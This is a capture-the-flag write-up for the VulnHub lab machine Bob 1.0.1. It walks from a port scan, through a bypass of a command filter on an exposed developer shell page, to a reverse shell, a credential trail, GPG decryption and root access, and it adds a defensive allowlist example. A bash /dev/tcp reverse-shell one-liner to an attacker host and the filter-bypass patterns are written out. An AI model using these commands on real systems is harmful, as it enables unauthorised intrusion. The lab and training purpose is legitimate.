CTF WRITEUP VULNHUB BLACK BOX EASY

Bob 1.0.1 — VulnHub Easy

Written By: Th0mas_sh316y
Difficulty: Easy
Platform: VulnHub
Target IP: 192.168.1.18

Machine: Bob 1.0.1 · Easy · Linux · VulnHub

Bob 1.0.1 is a treasure-hunt box. The initial RCE is straightforward but everything after that is reading files left behind by lazy admins — HTML comments, hidden text files, and finally a GPG-encrypted login.txt with the passphrase HARPOCRATES (Greek god of silence — fitting). Took roughly an hour. The chain rewards thorough enumeration over exploit skill.

01_Reconnaissance

The scan shows SSH on the non-standard port 25468 and HTTP on 80. The site's robots.txt lists /dev_shell.php as its first interesting entry, clearly a shell-style developer tool exposed by mistake.

terminal / nmap + robots
$ nmap -sV -p- 192.168.1.18
80/tcp    open  http
25468/tcp open  ssh

$ curl http://192.168.1.18/robots.txt
Disallow: /dev_shell.php
Disallow: /login.html

/dev_shell.php — developer shell page exposed.

02_dev_shell.php_Bypass

The page filters obvious commands such as cat, ls and nc, but the filter is a simple string match, so shell metacharacters get past it: l\s works, and so does echo cmd | bash. I used the second pattern to spawn a reverse shell.

terminal / filter bypass
# Filter blacklist test
"ls"  → blocked
"l\s" → works (backslash defeats simple string filter)

# Reverse shell payload
echo "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1" | bash

# Listener catches
$ nc -lvnp 4444
www-data@bob:/var/www/html$ id
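
Why the substring blacklist above fails, next to an allowlist form that rejects both bypass patterns (an added example, not code from the box or from the original writeup). The blacklist is a constructed model of the filter as described here, since dev_shell.php's source is not shown, and the allowed programs and flags are assumptions.

```python
import shlex

# Constructed model of the filter described above: block input containing a
# listed command name as a plain substring. dev_shell.php's real source is
# not shown in the writeup, so this is an assumption about how it behaves.
BLOCKED = ("cat", "ls", "nc")

def blacklist_allows(cmd: str) -> bool:
    return not any(word in cmd for word in BLOCKED)

# Hardened form. Assumption: the tool only needs these programs and flags.
ALLOWED = {"id": {"-u", "-g"}, "whoami": set(), "uptime": set()}
SHELL_META = set("|&;<>()$`\\\"'*?[]{}~!#\n")

def allowlist_argv(cmd: str):
    """Return argv to execute without a shell, or None to reject the input."""
    if any(ch in SHELL_META for ch in cmd):
        return None  # no escapes, quotes, pipes, redirects or expansions
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOWED:
        return None  # program name must match the allowlist exactly
    if any(arg not in ALLOWED[argv[0]] for arg in argv[1:]):
        return None  # arguments are allowlisted per program as well
    return argv      # e.g. subprocess.run(argv, shell=False)

# Constructed inputs; the second and third follow the patterns in the writeup.
SAMPLES = ["ls", "l\\s", "echo id | bash", "id -u"]

def compare():
    return [(s, blacklist_allows(s), allowlist_argv(s)) for s in SAMPLES]

if __name__ == "__main__":
    for cmd, passed, argv in compare():
        verdict = "pass" if passed else "block"
        print(f"{cmd!r:18} blacklist={verdict:5} allowlist={argv}")
```

An allowlist only limits what such a page can run; a command-execution page reachable from the web root and listed in robots.txt is better removed from production entirely.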

03_Credential_Trail

The interesting part is the trail: three files spread across the box, each pointing to the next. .old_passwordfile.html in jc's home directory hints at users, notes.sh in /var/www/html mocks the dev who left credentials in a script, and theadminisdumb.txt in seb's home is the punchline: a plaintext password for user bob.

terminal / breadcrumbs
$ find /home -type f 2>/dev/null
/home/jc/.old_passwordfile.html
/home/seb/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/theadminisdumb.txt
/home/bob/login.txt.gpg
/home/bob/staff.txt

$ cat /home/seb/Documents/Secret/.../theadminisdumb.txt
[REDACTED — bob's password as plaintext]

$ ssh bob@192.168.1.18 -p 25468
bob@bob:~$ ls
login.txt.gpg  staff.txt

04_GPG_Decryption_with_HARPOCRATES

login.txt.gpg is symmetrically encrypted. staff.txt contains the hint — the passphrase is HARPOCRATES (Greek god of silence). gpg -d with that passphrase reveals the root password.

terminal / gpg decrypt
bob@bob:~$ cat staff.txt
"...the only one capable of holding their tongue is the keeper of silence himself..."

bob@bob:~$ gpg -d login.txt.gpg
Enter passphrase: HARPOCRATES
gpg: encrypted with 1 passphrase
[REDACTED — root password]

bob@bob:~$ sudo su
[sudo] password for bob: [REDACTED]
root@bob:/home/bob# id
uid=0(root) gid=0(root)

05_Attack_Chain_Summary

  1. nmap → SSH 25468 + HTTP 80 → robots.txt → /dev_shell.php
  2. dev_shell.php filter bypass via "echo cmd | bash"
  3. Reverse shell as www-data → enumerate /home
  4. seb's theadminisdumb.txt → bob password → SSH as bob
  5. staff.txt hint → gpg -d login.txt.gpg → passphrase HARPOCRATES
  6. Decrypted root password → sudo su → root